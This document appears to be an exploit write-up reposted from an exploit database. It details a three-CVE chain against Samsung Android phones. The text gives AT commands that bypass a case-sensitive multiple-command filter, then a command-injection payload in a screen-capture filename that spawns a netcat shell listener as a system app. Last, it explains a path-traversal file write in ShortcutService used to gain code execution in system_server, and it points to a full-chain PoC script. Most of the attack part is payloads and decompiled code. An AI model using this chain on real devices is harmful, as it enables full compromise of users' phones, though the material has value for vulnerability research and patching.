Share
## https://sploitus.com/exploit?id=C5EF0495-F285-5BD7-8ED7-78FD307F5464
# Part 1: Arbitrary AT command execution (CVE-2026-20980)


Application Processor(AP) commands are managed by at_distributor after switching the connection mode in an unlocked device using.

```
AT+SWATD=0
AT+ACTIVATE=0,0,0
AT+SWATD=1
```
at_distributor verifies AT commands through the function pacm_check_at_cmds

```
void main(int32_t arg1, void* arg2) __noreturn
{
    int32_t var_21b0 = arg1;
    data_42c170 = SignalHandler;
    sigemptyset(0x42c178);
    ...
    if (pacm_check_at_cmds(&data_42c1b4, &var_2160, &data_404a82, v0_11) != 1)  {
        SendToTerminal(&var_2160,                            
        __strlen_chk(&var_2160, 0x80)                    
    } else {
        __android_log_print(3, "AT_Distributor", "%s()", "HandleMessageFromUart");
        ...
    }   
    ...
}

```
function logic is located at
```
ldd at_distributor
libpacm_client.so => /system/lib64/libpacm_client.so
```

the function calls is_multiple_cmds verifies if the AT command contains multiple cmds.

```
uint64_t pacm_check_at_cmds(int64_t arg1, char* arg2)
{
    uint64_t x24 = _ReadMSR(tpidr_el0);
    int64_t x8 = *(x24 + 0x28);
    int32_t var_284;
    ...
    if (!arg1)
    {
        __android_log_print(6, "PACMAN", "%s : AT Command is NULL\n", "pacm_check_at_cmds", v0);
        x20_1 = var_284;
        ...
    } else {
        Command::set_command(&var_280);
        char var_2d0;
        void* var_2c0;
        
        if (var_2d0 & 1)
            operator delete(var_2c0, var_2d0 & 0xfffffffffffffffe);
        int32_t x8_6;
        
        if (!Command::is_multiple_cmds())
        {
            int32_t x0_13;
            int128_t v0_1;
            x0_13 = Command::preprocess_cmds(&var_280);
            ...
        }
        ...
    }    
}   

int64_t Command::is_multiple_cmds()
{
    ...
    size_t x0 = strlen("
at+");
    if (x0) {
        ...
        memcmp(x0_4, "
at+", x0);
        ...
    }
    size_t x0_1 = strlen("
AT+");
    if (x0_1) {
        ...
        memcmp(x0_7, "
AT+", x0_1);
        ...
    }
    size_t x0_2 = strlen("
at+");
    if (x0_2) {
        ...
        memcmp(x0_10, "
at+", x0_2);
        ...
    }
    size_t x0_3 = strlen("
AT+");
    if (x0_3) {
        ...
        memcmp(x0_13, "
AT+", x0_3);
        ...
    }
    ...
    return 1;
}
```
so an AT command with this payload will fail .
```
TX: AT+\nAT+VERSNAME=3,2,1
RX: +CME Error:PACM(AP),MULTIPLE_CMD
```
but is_multiple_cmd fails to verify "aT+" or "At+" thus the protected/unregistered command gets executed

```
TX: AT+\naT+VERSNAME=1,3,0 (Note:AT+VERSNAME=1,3,0 is a protected command)
RX: +VERSNAME:1,SM8550,SM8550
```

# Part 2: Arbitrary system command execution in FacAtFunction (CVE-2026-20981)

FacAtFunction(uid 1000) a system app, processes most of the AP AT commands,
specifically an unregistered command `AT+CAMEAUTO`

this command is used to capture screen using shell function/exec. 

```
...
if (checkArgu(strArr, new String[]{"0", "1", "0", "2"})) {
                    FtUtil.log_d(((AtCommandHandler) this).CLASS_NAME, "handleCommand", "Screen Capture & File Name : " + strArr[4]);
                    screenCapture(strArr[4]);
                    FtUtil.log_d(((AtCommandHandler) this).CLASS_NAME, "screenCapture", "result : 1");
                    str = responseOK(strArr[0]);
                    ...
}

public final void screenCapture(String str) {
        Process process;
        FtUtil.log_i(((AtCommandHandler) this).CLASS_NAME, "ScreenCapture", "ScreenCapture Start");
        ...
        String str3 = i < 10 ? m + "SCREENIMAGE0" + i + "_" + str + "_" + simpleDateFormat.format(new Date(currentTimeMillis)) + ".jpg" : m + "SCREENIMAGE" + i + "_" + str + "_" + simpleDateFormat.format(new Date(currentTimeMillis)) + ".jpg";
        FtUtil.log_i(((AtCommandHandler) this).CLASS_NAME, "screenCapture", str + i + " / " + str3);
        ?? r15 = {"/system/bin/sh", "-c", str3};
        Process process2 = null;
        try {
            try {
                FtUtil.log_i(((AtCommandHandler) this).CLASS_NAME, "ScreenCapture", "capture command");
                process = Runtime.getRuntime().exec(r15);
            ...
        ...
}
```

the filename is taken from user , but screenCapture func fails to sanitize the filename.
and since we can execute unregistered command from **Part 1**, it can be executed as.

```
TX: AT\naT+CAMEAUTO=0,1,0,2,/;/system/bin/toybox netcat -s 127.0.0.1 -p 1234 -L sh -l;
RX: OK
```

# Part 3: ShortcutService arbitrary file write (CVE-2026-20982)

Samsung have implemented custom restore method for Smart Switch to restore Bitmap files 

```
public void restoreBitmapsFromBackupService(ParcelFileDescriptor parcelFileDescriptor, String str, String str2) {
        enforceScloudBackupWritePermission();
        try {
            ParcelFileDescriptor.AutoCloseInputStream autoCloseInputStream = new ParcelFileDescriptor.AutoCloseInputStream(parcelFileDescriptor);
            FileOutputStream openIconFileForWriteSmartSwitch = openIconFileForWriteSmartSwitch(0, str, str2);
            byte[] bArr = new byte[1024];
            while (true) {
                int read = autoCloseInputStream.read(bArr);
                if (read <= 0) {
                    break;
                }
                openIconFileForWriteSmartSwitch.write(bArr, 0, read);
            }
            if (openIconFileForWriteSmartSwitch != null) {
                openIconFileForWriteSmartSwitch.close();
            }
            autoCloseInputStream.close();
        } catch (Exception unused) {
        }
}
public final FileOutputStream openIconFileForWriteSmartSwitch(int i, String str, String str2) {
        File file = new File(getUserBitmapFilePath(i), str);
        if (!file.isDirectory()) {
            file.mkdirs();
            if (!file.isDirectory()) {
                Slog.d("ShortcutService", "Unable to create directory " + file);
                throw new IOException("Unable to create directory " + file);
            }
            SELinux.restorecon(file);
        }
        File file2 = new File(file, str2);
        if (file2.exists()) {
            Slog.d("ShortcutService", "Unable to create file - already exists " + file2);
            throw new IOException("Unable to create file - already exists " + file2);
        }
        return new FileOutputStream(file2);
}

public final void enforceScloudBackupWritePermission() {
        injectEnforceCallingPermission("com.samsung.android.scloud.backup.lib.write", null);
}
```

restoreBitmapsFromBackupService is gated by permission "com.samsung.android.scloud.backup.lib.write", 
we will use uid 1000 from **Part 2** which have necessary permission to call the function .

here it fails to sanitize str(directory) , str2(filename) from path traversal. 
Since ShortcutService runs in `system_server` process, we can overwrite base.apk of a system app or modify packages.xml to gain code execution in `system_server`

# PoC

* Complete chain of all three CVE is present in PoC/at.py
* Source for classes.dex in PoC/CVE-2026-20982/Exploit.java
* [PoC Demo](PoC/Rec/poc.mp4)